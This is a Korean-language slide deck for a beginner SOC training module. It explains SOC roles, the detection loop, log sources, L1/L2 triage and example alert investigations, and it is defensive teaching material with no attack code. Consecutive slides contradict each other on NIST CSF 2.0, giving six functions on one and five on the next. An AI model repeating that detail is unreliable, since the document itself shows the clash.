26년 AI 보안운영 및 위협탐지 실무인력 양성 · (주)아울네스트
Module 1.
SOC 개요
공격을 완전히 막는 것이 아니라, 빠르게 발견하고 근거 있게 대응하는 운영 체계
대상
비전공 입문자 / 보안 관제 입문자
시간
총 4시간 (이론 3H + 실습 1H)
핵심 키워드
SOC · SIEM · EDR · Alert · Incident
🛡️
(주)아울네스트
한국인터넷진흥원 발주 · 2026
1
오늘의 여정
4시간 안에 SOC의 전체 그림을 잡는다
과정 안내

Intro
15분

SOC란
35분

운영 구조
45분

이벤트 흐름
30분

보안 도구
35분

공격 시나리오
40분

실습
30분

대상

비전공 입문자
보안 관제 입문자

핵심 키워드

SOC, Log, Event, Alert, Incident, SIEM, EDR, SOAR

오늘의 목표

Alert를 보고 1차 판단할 수 있는 관점 익히기

각 파트가 오늘 실습과 어떻게 연결되는가
SOC란? — "무엇을 하는 조직인지" 전체 그림을 잡아야 나머지가 의미를 가진다
운영 구조 — "내가 어떤 역할인지"를 알아야 내 판단의 책임 범위를 안다
이벤트 흐름 — Log·Alert·Incident를 구분하지 못하면 실습 질문 자체를 이해할 수 없다
보안 도구 — 도구 이름이 나올 때 "어디서 무엇을 보는 도구인지" 연결하기 위해
오늘 수업에서 반드시 가져가야 할 것
개념 암기가 아니라, Alert를 보고 기본 판단을 내릴 수 있게 되는 것
학습 목표

개념 이해

SOC의 정의와 역할을 설명할 수 있다

구분 능력

Log / Event / Alert / Incident의 차이를 구분할 수 있다

도구 이해

SIEM / EDR / IDS·IPS / SOAR의 역할을 설명할 수 있다

판단 실습

간단한 Alert에 대해 근거 기반 1차 판단을 작성할 수 있다

  모든 파트는 마지막 실습과 연결됩니다. "정답 암기"가 아니라 "판단 기준 이해"에 초점을 맞춰주세요.
"이걸 배우면 실제로 뭐가 달라지나요?"
수업 전: 화면에 경고: 해외 IP 로그인 감지 라는 알람이 뜨면 "어떻게 해야 하지?" 막막하다.
수업 후: 이 계정이 민감한가? 출장 등록이 있는가? 로그인 후 어떤 행동을 했는가?를 순서대로 확인하고, "재무 계정이며 출장 기록 없음, 직후 대량 다운로드 → HIGH, L2 에스컬레이션 권고"를 문장으로 쓸 수 있다.
예방만으로는 충분하지 않다
차이는 "막았느냐"보다 "얼마나 빨리 발견하고 정확히 대응했느냐"에서 난다
Why SOC?

공격 표면 확대

  • 클라우드 · SaaS · 원격근무 · 외부 협업
  • 모든 위협을 사전에 차단하는 것은 현실적으로 불가능

피해의 핵심 변수

침해 피해는 "발생 여부"보다
"발견 지연 시간"에 크게 좌우된다

🛡️
예방 중심
완전 차단 불가
⬇️ 패러다임 전환
📡
탐지 · 판단 · 대응 중심
빠른 발견 + 정확한 대응
비유로 이해하기
❌ 예방만 있는 보안
마치 아파트 정문에만 경비원을 세우고 내부 복도나 층간에는 CCTV도 없는 것과 같다. 침입자가 정문을 한 번 통과하면 내부에서 무슨 일이 일어나는지 전혀 알 수 없다.
✅ 탐지·대응 중심 보안
정문 외에도 각 층 복도, 엘리베이터, 주차장에 CCTV를 두고, 이상 행동이 감지되면 즉시 내부 경비팀이 달려가는 체계. SOC는 그 CCTV를 24시간 보는 관제 센터다.
최근 위협 맥락
왜 탐지와 대응 속도가 중요한가 – 실제 데이터로 보기
Why SOC?
68%
인적 요소 관련 침해
(피싱·자격증명·실수)
194일
평균 침해 탐지 소요 시간
(산업 평균, 글로벌)
≤1h
성숙한 SOC의 목표 MTTD
(Mean Time To Detect)
  공격은 언젠가 들어온다. 차이는 얼마나 빨리 발견하고 얼마나 정확히 대응하느냐에서 난다.
참고: Verizon 2025 DBIR, IBM Cost of a Data Breach Report
보강 설명Verizon 2025 DBIR 등 최근 보고서에 따르면, 침해 사고의 상당수가 피싱과 자격증명 탈취에서 시작됩니다. 그리고 침해 발견까지 수일에서 수개월이 걸리는 경우도 많습니다. 이 지연…
DBIR피싱자격증명
설명 확장
  • DBIR 관점에서 이 주제의 목적을 다시 설명하기
  • 피싱 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • DBIR·피싱 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
NIST CSF 2.0과 SOC의 위치
SOC는 Detect · Respond · Recover의 핵심 실행 조직
프레임워크
🏛️
Govern
거버넌스·전략
🔍
Identify
자산·위험 식별
🛡️
Protect
예방·보호
📡
Detect
탐지 ← SOC 핵심
🚨
Respond
대응 ← SOC 핵심
🔄
Recover
복구 ← SOC 연계
NIST CSF 2.0의 6가지 기능 중 SOC는 Detect · Respond · Recover를 직접 실행하는 운영 조직
NIST CSF 5가지 기능 — SOC는 어디서 일하는가?
GOVERN
정책·전략·리스크
CISO·경영진
IDENTIFY
자산·취약점 파악
L3 일부 관여
PROTECT
방화벽·패치·훈련
IT운영팀 주도
DETECT ★
이상징후 탐지·모니터링
SOC 핵심 업무
RESPOND ★
봉쇄·대응·복구
IR팀 핵심 업무
💡 SOC는 DETECT + RESPOND를 담당합니다. "예방"(PROTECT)은 IT팀 몫이고, SOC는 예방이 뚫렸을 때 가동됩니다.
비유로 이해하는 SOC
잠금장치만으로는 모든 침입을 막을 수 없다
Why SOC?
🔒
예방 = 잠금장치
방화벽, 접근통제, 패치, 정책
→ 진입을 어렵게 만든다
→ 하지만 완벽하지 않다
📹
SOC = CCTV + 경비실
모니터링, 분석, 판단, 대응
→ 이상 징후를 빠르게 발견한다
→ 피해를 최소화한다
현대 보안 운영 = 잠금장치(예방) + CCTV·경비실(SOC) + 비상 대응팀(IR)
보강 설명비유로 설명하면, 예방은 건물에 잠금장치를 다는 것이고, SOC는 CCTV와 경비실을 운영하는 것입니다. 잠금장치만으로는 모든 침입을 막을 수 없기 때문에, 이상 징후를 실시간으로 감시하고…
예방탐지비유
설명 확장
  • 예방 관점에서 이 주제의 목적을 다시 설명하기
  • 탐지 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • 예방·탐지 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
01
SOC란 무엇인가
SOC의 정의, 미션, 운영 사이클, 데이터, 협업 구조
약 35분
SOC 정의 미션 운영 사이클 3요소 협업 구조
SOC(Security Operations Center)란 무엇인가
사람 + 프로세스 + 기술을 결합해 보안 이벤트를 모니터링하고 판단하며 대응을 연결하는 운영 조직
Part 1

수집

보안 로그와 텔레메트리를 수집한다

탐지·분석

이상 징후를 탐지하고 분석한다

판단

실제 위험인지 판단한다

대응 연결

필요한 대응을 수행하거나 적절한 팀으로 연결한다

SOC
People
Decision
Technology
Process
SOC는 기술 시스템이 아니라
운영 체계입니다
보강 설명SOC를 단순히 보안 관제실 정도로 이해하면 절반만 이해한 것입니다. SOC의 본질은 모니터링 화면을 보는 것이 아니라, 보안과 관련된 신호를 근거로 의미 있는 운영 판단을 내리는 데 있습니다…
사람프로세스기술
설명 확장
  • 사람 관점에서 이 주제의 목적을 다시 설명하기
  • 프로세스 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • 사람·프로세스 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
SOC의 진짜 산출물은 무엇인가
로그 자체가 아니라, 근거와 우선순위가 붙은 "판단"이다
Part 1

Input
로그, 이벤트, 경고
위협 정보

Process
상관분석, 분류
조사, 검증

Output
판단, 티켓
에스컬레이션, 대응 권고
MTTD
Mean Time To Detect
탐지 속도
MTTR
Mean Time To Respond
대응 속도
FPR
False Positive Rate
오탐률
Coverage
Detection Coverage
탐지 범위
로그가 판단으로 바뀔 때 실제로 추가되는 것
의미 부여
단순 신호를 정상 운영인지, 위협 가능성이 있는지 설명 가능한 문장으로 바꾼다
우선순위
지금 조치할지, 모니터링할지, L2/IR로 넘길지 결정 기준이 생긴다
다음 행동
티켓·에스컬레이션·사용자 확인처럼 누가 무엇을 할지까지 연결된다
→ 그래서 좋은 SOC는 로그 양보다 MTTD, MTTR, FPR, Coverage 같은 운영 지표를 함께 본다.
보강 설명초보자들이 흔히 하는 오해는 SOC는 로그를 보는 조직이라는 생각입니다. 하지만 로그는 원재료일 뿐입니다. 실제로 비즈니스에 필요한 것은 이게 위험한가, 얼마나 급한가, 누가 무엇을 해야…
판단우선순위MTTD
설명 확장
  • 판단 관점에서 이 주제의 목적을 다시 설명하기
  • 우선순위 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • 판단·우선순위 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
SOC는 반복 루프로 운영된다
수집에서 끝나지 않고, 대응과 룰 개선까지 돌아야 SOC 운영이 완성된다
Part 1

수집
Collection
방화벽·서버·클라우드

정규화·상관분석
Correlation

Alert 생성
Detection

1차 분류
Triage

상세 조사
Investigation

대응
Response

피드백·개선
Improve
  Improve → 다시 Collection으로 연결  |  이 루프가 돌아야 같은 공격을 다음에는 더 빨리 잡을 수 있다
각 단계를 실무 용어로 풀면
수집(Collection): 서버·PC·방화벽·클라우드 등에서 로그를 SIEM으로 끌어모음
정규화·상관분석: 제각각인 로그 형식을 통일하고, 여러 곳의 이벤트를 서로 연결
Triage(1차 분류): Alert 500개 중 진짜 조사할 50개를 빠르게 추려내는 관문
개선(Improve): "이번에 왜 놓쳤나"를 탐지 룰과 운영 절차에 반영해 다음 번엔 더 빨리 잡음
Assume Breach: 이미 뚫렸다고 가정하라
현대 보안 전략의 핵심 패러다임
Part 1
과거의 접근
"방화벽과 백신이 있으니
내부는 안전하다"
→ 한 번 뚫리면 무방비
현대의 접근 (Assume Breach)
"이미 침해자가 내부에
있을 수 있다고 가정한다"
→ 항상 탐지하고 검증한다
Zero Trust + Assume Breach = 누구도 신뢰하지 않고, 항상 검증하며, 침해를 전제로 탐지·대응 체계를 설계한다
→ SOC는 이 패러다임의 실행 조직
병원 비유
예전 보안: "건물 입구에서 발열 체크 → 통과하면 안전"
Assume Breach: "통과했더라도 내부에서 계속 이상 징후를 모니터링" — 병동 안에서도 CCTV, 출입 기록, 약품 접근 이력을 추적한다
은행 비유
예전 보안: "금고 열쇠를 가진 사람은 신뢰"
Assume Breach: "열쇠를 가진 직원이라도 비정상 시간, 비정상 금액 인출은 자동 감지·경보" — 내부자 위협도 탐지 대상
SOC가 없거나 실패하면?
탐지 지연 = 피해 확대 — 시간이 곧 비용이다
Why SOC?
탐지 지연 시
  • 공격자가 수주~수개월 내부 활동
  • 데이터 대량 유출 후 발견
  • 복구 비용 수배~수십배 증가
  • 브랜드 신뢰도 회복 불가 수준 하락
  • 법적 책임 · 과징금 · 소송
빠른 탐지 시
  • 공격자 활동 초기 단계에서 차단
  • 피해 범위 최소화
  • 복구 비용 대폭 절감
  • 비즈니스 연속성 유지
  • 규제 대응 신속 완료
침해 비용의 핵심 변수: 발견까지 걸린 시간(MTTD) — SOC가 이것을 줄이는 조직이다
같은 사고도 발견 시점에 따라 달라지는 운영 난이도
초기 발견 (1시간 이내)
계정 잠금·세션 종료·호스트 격리처럼 국소 조치로 피해를 작게 묶을 수 있다
중간 발견 (하루 단위)
측면 이동, 추가 수집, 동일 계정 확산 여부까지 조사해야 해 범위가 넓어진다
늦은 발견 (수일~수주)
유출·복구·법무·언론 대응까지 번져 기술 문제를 넘어 비즈니스 사고가 된다
보강 설명SOC가 없거나 제대로 작동하지 않으면 어떤 일이 벌어지는지 실제 사례를 통해 보겠습니다. 탐지 지연은 곧 피해 확대로 이어집니다.
실패탐지 지연피해
설명 확장
  • 실패 관점에서 이 주제의 목적을 다시 설명하기
  • 탐지 지연 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • 실패·탐지 지연 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
SOC의 다양한 운영 형태
어떤 형태든 핵심 기능(탐지·분석·판단·대응)은 동일하다
Part 1

자체 SOC (In-house)

  • 조직 내부에 직접 구축·운영
  • 높은 통제력과 맞춤형 운영
  • 비용과 인력 부담 큼

위탁 SOC (MSSP)

  • 전문 보안 업체에 운영 위탁
  • 비용 효율적, 빠른 도입
  • 커스터마이징 한계

하이브리드 SOC

  • 핵심은 내부, 일부는 위탁
  • 가장 많이 채택되는 형태
  • 통제력과 효율성 균형
본 과정에서 배우는 SOC 운영 원칙은 모든 형태의 SOC에 동일하게 적용됩니다
어떤 형태를 선택하는가? — 조직별 현실 고려사항
자체 SOC 선택 시
규제 산업(금융·의료·공공)에서 내부 데이터를 외부에 보내기 어렵거나, 매우 특화된 탐지 룰이 필요한 경우. 초기 구축비용이 높지만 장기적으로 맞춤화 가능.
MSSP 선택 시
보안 인력 채용이 어렵거나 예산이 제한적인 중소기업. 빠른 도입과 24시간 운영이 가능하지만, 업종 특화 탐지나 내부 정책 맞춤에 한계가 있다.
하이브리드 선택 시 (가장 일반적)
핵심 분석(L2·L3)은 내부에서 하고, 24시간 Alert 모니터링(L1)은 외주. 또는 SIEM 인프라는 직접 운영하되 위협 인텔리전스 피드는 MSSP에서 제공받는 구조.
SOC의 비즈니스 가치
탐지와 대응 역량이 비용에 미치는 실제 영향
Part 1
$4.88M
글로벌 평균 침해 비용
(2024, IBM)
-$1.76M
SOC/IR팀 보유 시
절감되는 평균 비용
100일+
200일 내 탐지 vs 이후 탐지
비용 차이 발생 구간
SOC는 비용 센터가 아니라 리스크 절감 투자 — 빠른 탐지가 수십억 원의 차이를 만든다
이 숫자가 실제로 의미하는 것
$4.88M (약 66억 원): 단순히 데이터 복구 비용이 아니다. 법률 비용, 규제 과징금, 고객 이탈, 브랜드 가치 하락, 임직원 대응 시간, 언론 대응, 시스템 재구축 비용을 모두 합친 숫자다.
-$1.76M (약 24억 원) 절감: SOC/IR팀이 있는 기업은 같은 침해가 발생해도 훨씬 빠르게 탐지·격리하기 때문에 피해 범위 자체가 달라진다. 연간 SOC 운영비와 비교하면 대부분의 경우 투자 대비 효과가 크다.
SOC 성숙도 단계
하루아침에 완성되지 않는다 — 오늘 배우는 것은 모든 단계의 기본기
Part 1
Lv.1
기본 수집
로그 수집·보관 시작
수동 확인 위주
Lv.2
규칙 기반 탐지
SIEM Alert 룰 운영
L1·L2 역할 분담
Lv.3
위협 헌팅
능동적 탐지 설계
ATT&CK 매핑
Lv.4
자동화·예측
SOAR 연동
AI/ML 기반 탐지
오늘 과정의 목표: Lv.2 수준의 기본기를 확실히 갖추기 — Log·Event·Alert·Incident 구분, Triage, 판단문 작성
각 레벨을 현실 조직으로 이해하면
Lv.1
방화벽 로그를 주 1회 수동 확인. 어디서 공격이 왔는지도 2주 후에 알게 되는 수준.
Lv.2 ← 오늘 목표
SIEM에 룰이 있고, Alert가 뜨면 L1이 분류하고 L2가 조사한다. 대부분의 중견·대기업 SOC.
Lv.3
공격이 Alert로 뜨기 전에 먼저 능동적으로 찾는다. 위협 헌팅 전담 인력이 있다.
Lv.4
반복 업무는 자동화. AI/ML이 이상 행위를 먼저 탐지해 분석가에게 우선순위를 제안한다.
SOC는 "여러 출처의 흔적"을 본다
동일한 행위도 사용자 맥락, 자산 중요도, 네트워크 흐름이 결합될 때 비로소 의미가 생긴다
Part 1

인증 로그

로그인 성공/실패, MFA, VPN, SSO

엔드포인트 로그

프로세스 실행, 파일 생성, PowerShell, 서비스 변경

네트워크 로그

DNS, Proxy, Firewall, IDS/IPS, NetFlow

클라우드 로그

IAM, API 호출, 저장소 접근, 관리 작업

이메일 로그

수신, 링크 클릭, 첨부 실행

컨텍스트 데이터

자산 중요도, 사용자 권한, 취약점, 위협 인텔리전스

좋은 SOC일수록 단순 로그 수집보다 컨텍스트 결합 능력이 중요하다
데이터 소스별 실무 예시
인증 로그 예시: "finance01이 오전 3시에 싱가포르 IP로 로그인 성공. 평소 서울에서만 접속." → 해외 접속 Alert 발생
엔드포인트 예시: "영업부 PC에서 cmd.exe → powershell.exe → 외부 IP 통신" 프로세스 트리 → 악성코드 감염 의심
네트워크 예시: "내부 서버가 평소 보내지 않던 외부 도메인에 443포트로 대량 데이터 전송" → 데이터 유출 의심
클라우드 예시: "AWS에서 새 IAM 사용자가 생성되고 S3 버킷 공개 설정 변경" → 권한 오용 또는 설정 오류
이메일 예시: "CFO에게 발신자명이 CEO지만 도메인이 micro5oft.com인 메일" → CEO 사칭 BEC 공격
컨텍스트 예시: "admin 계정 로그인 → 해당 계정 오너가 어제 퇴사 처리됨" → 퇴사자 계정 악용 가능성
같은 행위, 다른 맥락 = 다른 판단
컨텍스트가 없으면 같은 로그도 전혀 다르게 해석된다
Part 1
사례 1: 정상
user=kim_dev
src_country=US
result=login_success
컨텍스트: 출장 등록 확인됨, 미국 컨퍼런스 참석 중, 평소 사용 디바이스
정상 — Close
사례 2: 의심
user=finance01
src_country=US
result=login_success
컨텍스트: 출장 없음, 재무 VIP 계정, 신규 디바이스, 야간, 직후 대량 다운로드
HIGH — Escalate
로그는 같아도 맥락이 다르면 판단이 완전히 달라진다 — 이것이 SOC 분석의 핵심
같은 로그, 다른 맥락 — 추가 사례
🖥️ 관리자 권한 명령 실행
✅ 정상:
IT 팀원이 업무 시간에 유지보수 계획서에 따라 실행
🚨 위험:
같은 명령을 야간에 인턴 계정으로 실행 + 승인 기록 없음
📁 대량 파일 조회
✅ 정상:
월말 결산 담당자가 재무 폴더 수백 개 조회 → 매달 있는 패턴
🚨 위험:
같은 행위를 처음 접속하는 임시 계정이 새벽에 수행
SOC는 단독 플레이어가 아니다
탐지는 SOC가 하지만, 실제 대응은 IT·IAM·네트워크·현업과의 연결 위에서 완성된다
Part 1

SOC

  • 탐지, 분석
  • 우선순위 결정
  • 에스컬레이션

IT 운영

  • 시스템 점검
  • 서버 조치
  • 변경 이력 확인

IAM

  • 계정 잠금
  • 비밀번호 초기화
  • 권한 검토

네트워크/클라우드

  • 차단, 라우팅
  • 정책 수정

현업/시스템 오너

  • 정상 여부 확인
  • 영향도 판단

법무/홍보/경영진

  • 고위험 사고 시
  • 커뮤니케이션
실제 에스컬레이션 흐름: "해외 IP 로그인 Alert 발생"
SOC L1: 수신 → 계정 확인 → L2로
L2: "HIGH 판단" → IR 호출
IAM: 세션 종료
+
현업: 본인 확인
SOC는 "탐지+1차 판단"까지. 계정 잠금·격리·알림은 각 담당 팀이 실행한다. SOC는 "무전기"고, 행동은 현장 팀이 한다.
협업이 실패할 때 생기는 일 — 실제 패턴 2가지
❌ 사일로(Silo) 문제: L1이 에스컬레이션했는데 L2가 업무 공유 없이 응답 안 함. L1은 닫아야 할지 몰라 3시간 방치. 그 사이 공격자는 내부 이동 완료.
❌ 정보 손실 핸드오프: L1이 "이상한 트래픽 있음"만 적고 에스컬레이션. L2 인수 시 필요 로그 없어 처음부터 재조사 → 원본 로그는 이미 덮어쓰기 됨.
✅ 좋은 에스컬레이션의 4요소: ① 관련 로그 스냅샷 + ② 이미 확인한 것 + ③ 아직 모르는 것 + ④ 본인 판단 근거. 이 4가지가 있으면 L2는 처음부터 다시 시작하지 않아도 됩니다.
Check Point: Part 1 복습
지금까지 배운 내용을 빠르게 점검합니다
Part 1 · 퀴즈

스스로 답해 보세요

Q1. SOC를 한 문장으로 정의한다면?
Q2. SOC의 핵심 산출물은 "로그"인가, "판단"인가?
Q3. MTTD와 MTTR은 각각 무엇의 약자이고, 왜 중요한가?
Q4. SOC 운영 사이클에서 마지막 단계는 무엇이고, 왜 중요한가?
Q5. SOC가 단독으로 사고를 해결할 수 없는 이유는?
보강 설명핵심 개념을 짧게 꺼내보는 점검 구간입니다. 정답 여부보다 설명 순서와 근거가 더 중요합니다.
퀴즈복습
답변 힌트
  • 핵심 정의를 한 문장으로 먼저 답하기
  • 예시는 1개만 붙여 간결하게 설명하기
  • 용어 차이는 목적과 역할로 구분해 말하기
생각 순서
  • 사실 → 맥락 → 판단 순서를 유지하기
  • 오탐 가능성과 추가 확인 항목을 함께 적기
  • 마지막은 다음 조치 제안으로 마무리하기
토론 포인트
  • 다른 역할이라면 같은 질문을 어떻게 볼지
  • 판단을 바꿀 추가 데이터가 무엇인지
  • 실무에서의 영향과 우선순위까지 연결하기
Part 1 요약 — SOC란 무엇인가
Part 1 · 요약
✓ 정의: SOC = People + Process + Technology로 구성된 운영 체계
✓ 산출물: 로그가 아니라 근거와 우선순위가 붙은 판단
✓ 운영: 수집 → 분석 → 탐지 → 대응 → 개선의 반복 루프
✓ 데이터: 단일 로그가 아니라 여러 출처의 흔적을 결합
✓ 협업: SOC 단독이 아니라 IT·IAM·현업과의 연결 위에서 완성
Part 1의 핵심을 한 문장으로
"SOC는 공격을 완전히 막는 조직이 아니라, 빠르게 발견하고 근거 있게 판단하여 대응팀에 연결하는 조직이다"
이 한 문장을 기억하면 Part 2~6의 모든 내용이 그 아래 구체적인 방법론으로 연결된다.
보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.
운영 체계판단사이클
핵심 회수
  • 운영 체계·판단 핵심어를 세 문장으로 압축해 보기
  • 정의보다 역할·가치·흐름을 연결해서 설명하기
  • 비슷한 개념과의 차이를 짧게 대비해 보기
실무 연결
  • 현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
  • 판단이 필요한 순간과 비용을 함께 생각하기
  • 오탐과 과소판단이 만드는 리스크를 비교하기
복습 체크
  • 혼자 설명 가능한 핵심 용어 3개 고르기
  • 다음 모듈과 이어질 질문 1개 만들어 보기
  • 실무 문장으로 바꾸어 다시 써 보기
02
SOC 운영 구조
L1 · L2 · L3 · IR/CERT 역할과 핸드오프
약 45분
L1 분석가 L2 수석 L3 전문가 에스컬레이션 IR/CERT
대표적인 SOC 운영 구조
대부분의 SOC는 난이도와 책임에 따라 L1 · L2 · L3 · IR 형태로 역할이 나뉜다
Part 2

🔍 L1

Alert Triage

1차 분류
빠르고 일관된 판단

🔬 L2

Deep Analysis

상세 분석
범위 파악, 인시던트 판단

🎯 L3

Detection Engineering

헌팅, 룰 개선
탐지 공백 메우기

능동적으로 위협을 먼저 찾는다. ATT&CK 매핑으로 탐지 공백을 파악하고 룰을 작성한다.

🚨 IR/CERT

Incident Response

격리, 차단, 복구
사후 조치

실제 대응의 최종 단계. 시스템 격리·포렌식·복구·사후 보고까지 담당한다.
광범위·빠른 분류
깊은 분석
개선·헌팅
실제 대응
조직에 따라 역할 명칭과 경계는 다를 수 있음 – 본 슬라이드는 교육용 대표 모델
보강 설명이 구조는 절대적인 표준이라기보다, 실무에서 가장 널리 쓰이는 설명 방식입니다. 핵심은 누가 더 높은 직급인가가 아니라, 어떤 수준의 판단과 책임을 맡는가입니다.
L1L2L3
설명 확장
  • L1 관점에서 이 주제의 목적을 다시 설명하기
  • L2 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • L1·L2 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
L1: Alert Triage의 최전선
L1의 핵심 역량은 빠른 속도보다 "빠르고 일관된 분류"다
Part 2

L1이 하는 일

  • Alert의 사실 여부 확인
  • 중복 / 명백한 오탐 제거
  • 기본 컨텍스트 보강
  • Severity 초기 설정
  • 문서화 후 L2 또는 IR로 에스컬레이션
False Positive / Benign
Monitor / Watch
Escalate to L2

L1 체크 질문 (답이 "예"일 때의 결과)

룰이 정상 동작했는가? → 아니오(오류 로그)면 닫기. 예이면 다음으로.
이미 알려진 정상 행위인가? → 예(변경 관리 기록 있음)면 Benign 처리.
민감 계정/중요 자산 관련인가? → 예이면 작은 정황도 L2로 에스컬레이션.
즉시 조치가 필요한 신호인가? → 예(확산·파괴 징후)이면 L2 기다리지 말고 IR 즉시 통보.
보강 설명L1은 흔히 초급 역할로 생각되지만, 실제로는 SOC 전체 품질을 좌우하는 관문입니다. L1이 오탐을 잘 걸러내지 못하면 상위 분석가가 소음에 묻히고, 반대로 진짜 위험을 놓치면 대응 타이밍을…
Triage일관성오탐 제거
설명 확장
  • Triage 관점에서 이 주제의 목적을 다시 설명하기
  • 일관성 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • Triage·일관성 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
L1 분석가의 하루
하루 수백 건의 Alert 중 진짜 위험을 놓치지 않는 것이 핵심
Part 2
500+
하루 평균 Alert 수
~80%
오탐 또는 정상 행위
~5%
실제 에스컬레이션 필요

일반적인 L1 업무 흐름

Alert 큐 확인 사실 확인 오탐 닫기 컨텍스트 보강 에스컬레이션 문서화
⚠ "숫자보다 중요한 것은 맥락이다" — 200회 로그인 실패가 공격인지, 서비스 설정 오류인지는 맥락을 봐야 안다
❌ L1이 자주 하는 실수
  • Alert가 많으니 기계적으로 "Close" — Alert Fatigue
  • 로그인 실패 200회 = 무조건 공격으로 에스컬레이션 — 서비스 설정 오류일 수 있음
  • 문서화 없이 구두로만 전달 — 인수인계 때 정보 손실
  • 컨텍스트 확인 없이 로그 하나만 보고 판단
✅ 좋은 L1의 습관
  • Alert 닫기 전 "왜 닫는지" 한 줄 메모 남기기
  • 오탐 패턴을 팀과 공유해 룰 개선 건의
  • 에스컬레이션 시 "내가 확인한 것"과 "아직 모르는 것"을 구분해서 전달
  • 중요 계정/자산 목록을 숙지해 우선순위 빠르게 판단
L1 분석가의 실제 8시간 — 야간 22:00~06:00 타임라인
22:00교대 인수인계 — 이전 조로부터 진행 중인 케이스 2건 인수, 활성 Alert 37건 확인 23:10Alert#1142: "외부IP 로그인 시도 50회" → 블록리스트 IP 조회 → 알려진 스캐너 봇 → Benign 처리 00:30Alert#1198: "관리자 계정 새벽 로그인" → 변경관리 DB 확인 → 예정된 배치 작업, Benign 02:47Alert#1231: "내부 서버→외부 C2 비정상 트래픽" → 즉시 L2 에스컬레이션 + 상세 컨텍스트 문서화 03:30Alert 14건 추가 처리 — 자동화 도구, 모니터링 봇, 정기 스캔 → 대부분 오탐 05:45교대 준비 — 처리 52건, 에스컬레이션 1건, 미해결 0건. 인수인계 문서 작성 완료.
💡 52건 중 51건은 "아무 일 없음"이 올바른 답이었습니다. L1의 가치는 그 02:47의 1건을 놓치지 않는 것에 있습니다. 지루한 밤이 좋은 밤입니다.
L2: 무슨 일이 일어났는지 재구성하는 분석가
행위의 맥락과 범위, 영향도를 설명하는 것이 L2의 역할
Part 2

L2가 하는 일

  • 관련 로그와 이벤트를 추가 수집
  • 시간순 타임라인 재구성
  • 영향받은 계정/호스트/서비스 범위 확인
  • 가설 검증: 정상행위 vs 비정상행위
  • Incident 여부 판단 및 대응 권고
L2와 L1의 차이: L1은 "이 Alert를 처리해야 하는가?"를 결정. L2는 "무슨 일이 실제로 일어났는가?"를 설명. L1은 100건 빠르게, L2는 10건 깊게.
Who · What · When · Where · How
Timeline Reconstruction
Scope / Impact / Verdict
L2 실제 조사 예시: "해외 IP 로그인" Alert 받았을 때
L1 에스컬레이션 노트 확인: "22:14 싱가포르 IP, finance01, 신규 디바이스, MFA 성공"
SIEM에서 동일 계정 전후 30분 행동 조회: 로그인 직후 340개 파일 조회, 85개 다운로드 확인
해당 IP 위협 인텔리전스 조회: VirusTotal / AbuseIPDB → 알려진 VPN 출구 노드인지 확인
사용자 HR 정보 확인: 출장 등록? 재택 승인? 평소 접속 국가 이력?
타임라인 완성 + Verdict 작성: "HIGH — 계정 탈취 가능성. IR 에스컬레이션 + 세션 종료 권고"
L2 조사 실제 흐름 — "관리자 계정 새벽 3시 로그인" 케이스
STEP 1 타임라인지난 30일 로그인 이력 전수 조회 → "이 계정은 항상 오전 9~18시에만 사용됐다"
STEP 2 측면이동로그인 후 접근 시스템 확인 → 평소 미사용 HR DB + 재무 시스템 접근 기록 발견
STEP 3 데이터30분 내 HR DB 3,000건 조회 → 평소 하루 최대 50건 → 대량 수집 패턴 확인
STEP 4 확인계정 소유자 전화 → "저 오늘 새벽 3시에 일 안 했는데요?"계정 탈취 확정
STEP 5 대응계정 즉시 잠금 + IR팀 통보 + 피해 범위 초안 작성 → Incident 공식 선언
